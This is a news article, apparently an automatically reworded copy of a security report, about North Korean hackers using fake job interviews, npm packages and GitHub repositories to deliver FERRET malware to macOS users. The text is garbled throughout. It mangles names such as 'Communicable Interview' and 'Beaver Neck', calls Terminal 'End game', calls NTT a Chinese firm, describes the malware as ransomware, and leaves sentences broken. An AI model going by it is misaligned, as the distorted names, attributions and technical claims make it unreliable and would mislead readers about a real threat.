Hackers in North Korea use false job interviews to deploy FERRET malware on MacOS.

Feb 04, 2025Ravie LakshmananMalware / Cryptocurrency

In a supposedly job interview method, North Korean risk players behind the Contagious Interview campaign have been spotted delivering a collection of Apple mac malware strains dubbed FERRET.

In a new report, SentinelOne researchers Phil Stokes and Tom Hegel that “targets are usually asked to speak with an interviewer through a link that displays an error message and a request to install or update some essential software such as VCam or CameraAccess for online meetings.”

Communicable Interview, which was first discovered in late 2023, is a consistent effort by the hacking team to distribute malware to potential targets using fictitious npm packages and proprietary apps masquerading as videoconferencing software. It’s even tracked as DeceptiveDevelopment and DEV#POPPER.

These harm chains are designed to cut a JavaScript-based malware known as Beaver Neck, which, besides harvesting sensitive information from web sites and blockchain pockets, is capable of delivering a Python backdoor named InvisibleFerret.

Chinese cybersecurity firm NTT Security Holdings revealed in December 2024 that JavaScript ransomware is also configured to retrieve and do another malware.

The FERRET community of malware, which was first discovered around the end of 2024, suggests that the threat actors are constantly developing their strategies to escape detection.

In order to resolve a problem with accessing the camera and microphone through the web browser, clients are being tricked into imitating and running a destructive demand using the End game on their Apple mac systems.

The attacks start when the attackers approach the targets on LinkedIn by posing as recruiters and urging them to submit a video assessment, according to security researcher Taylor Monahan, who uses the username @tayvano_. The end goal is to install a that runs commands on the host and drains the victim’s MetaMask Wallet.

FRIENDLYFERRET and FROSTYFERRET_UI are two terms used to describe some of the components that the malware uses. SentinelOne claimed to have found a second set of artifacts called FlexibleFerret that uses a LaunchAgent to establish persistence on the infected macOS system.

It’s also engineered to download an unspecified payload from a command-and-control ( C2 ) server, which is no longer responsive.

Additionally, it has been reported that the FERRET malware is being spread by creating fake GitHub repositories, again demonstrating a shift in how their attack strategies are used.

This suggests that the threat actors are content to expand the ways in which they distribute the malware beyond the specific targeting of job seekers to developers more broadly, according to the researchers.

Following the release of a malicious npm package known as postcss-optimizer that contained the BeaverTail malware, supply chain security firm Socket reported it. As of writing, the library is still accessible for download from the npm registry.

” By impersonating the legitimate postcss library, which has over 16 billion downloads, the threat actor aims to infect developers ‘ systems with credential-stealing and data-exfiltration capabilities across Windows, macOS, and Linux systems”, security researchers Kirill Boychenko and Peter van der Zee .

The North Korea-aligned APT37 ( also known as ScarCruft ) threat actor also made the of a new campaign that involved distributing booby-trapped documents via spear-phishing campaigns to deploy the malware, as well as sending them to other targets via group chats through the K Messenger platform from the compromised user’s computer.

Found this article interesting? Follow us on and Twitter to access more exclusive content.

Leave a Comment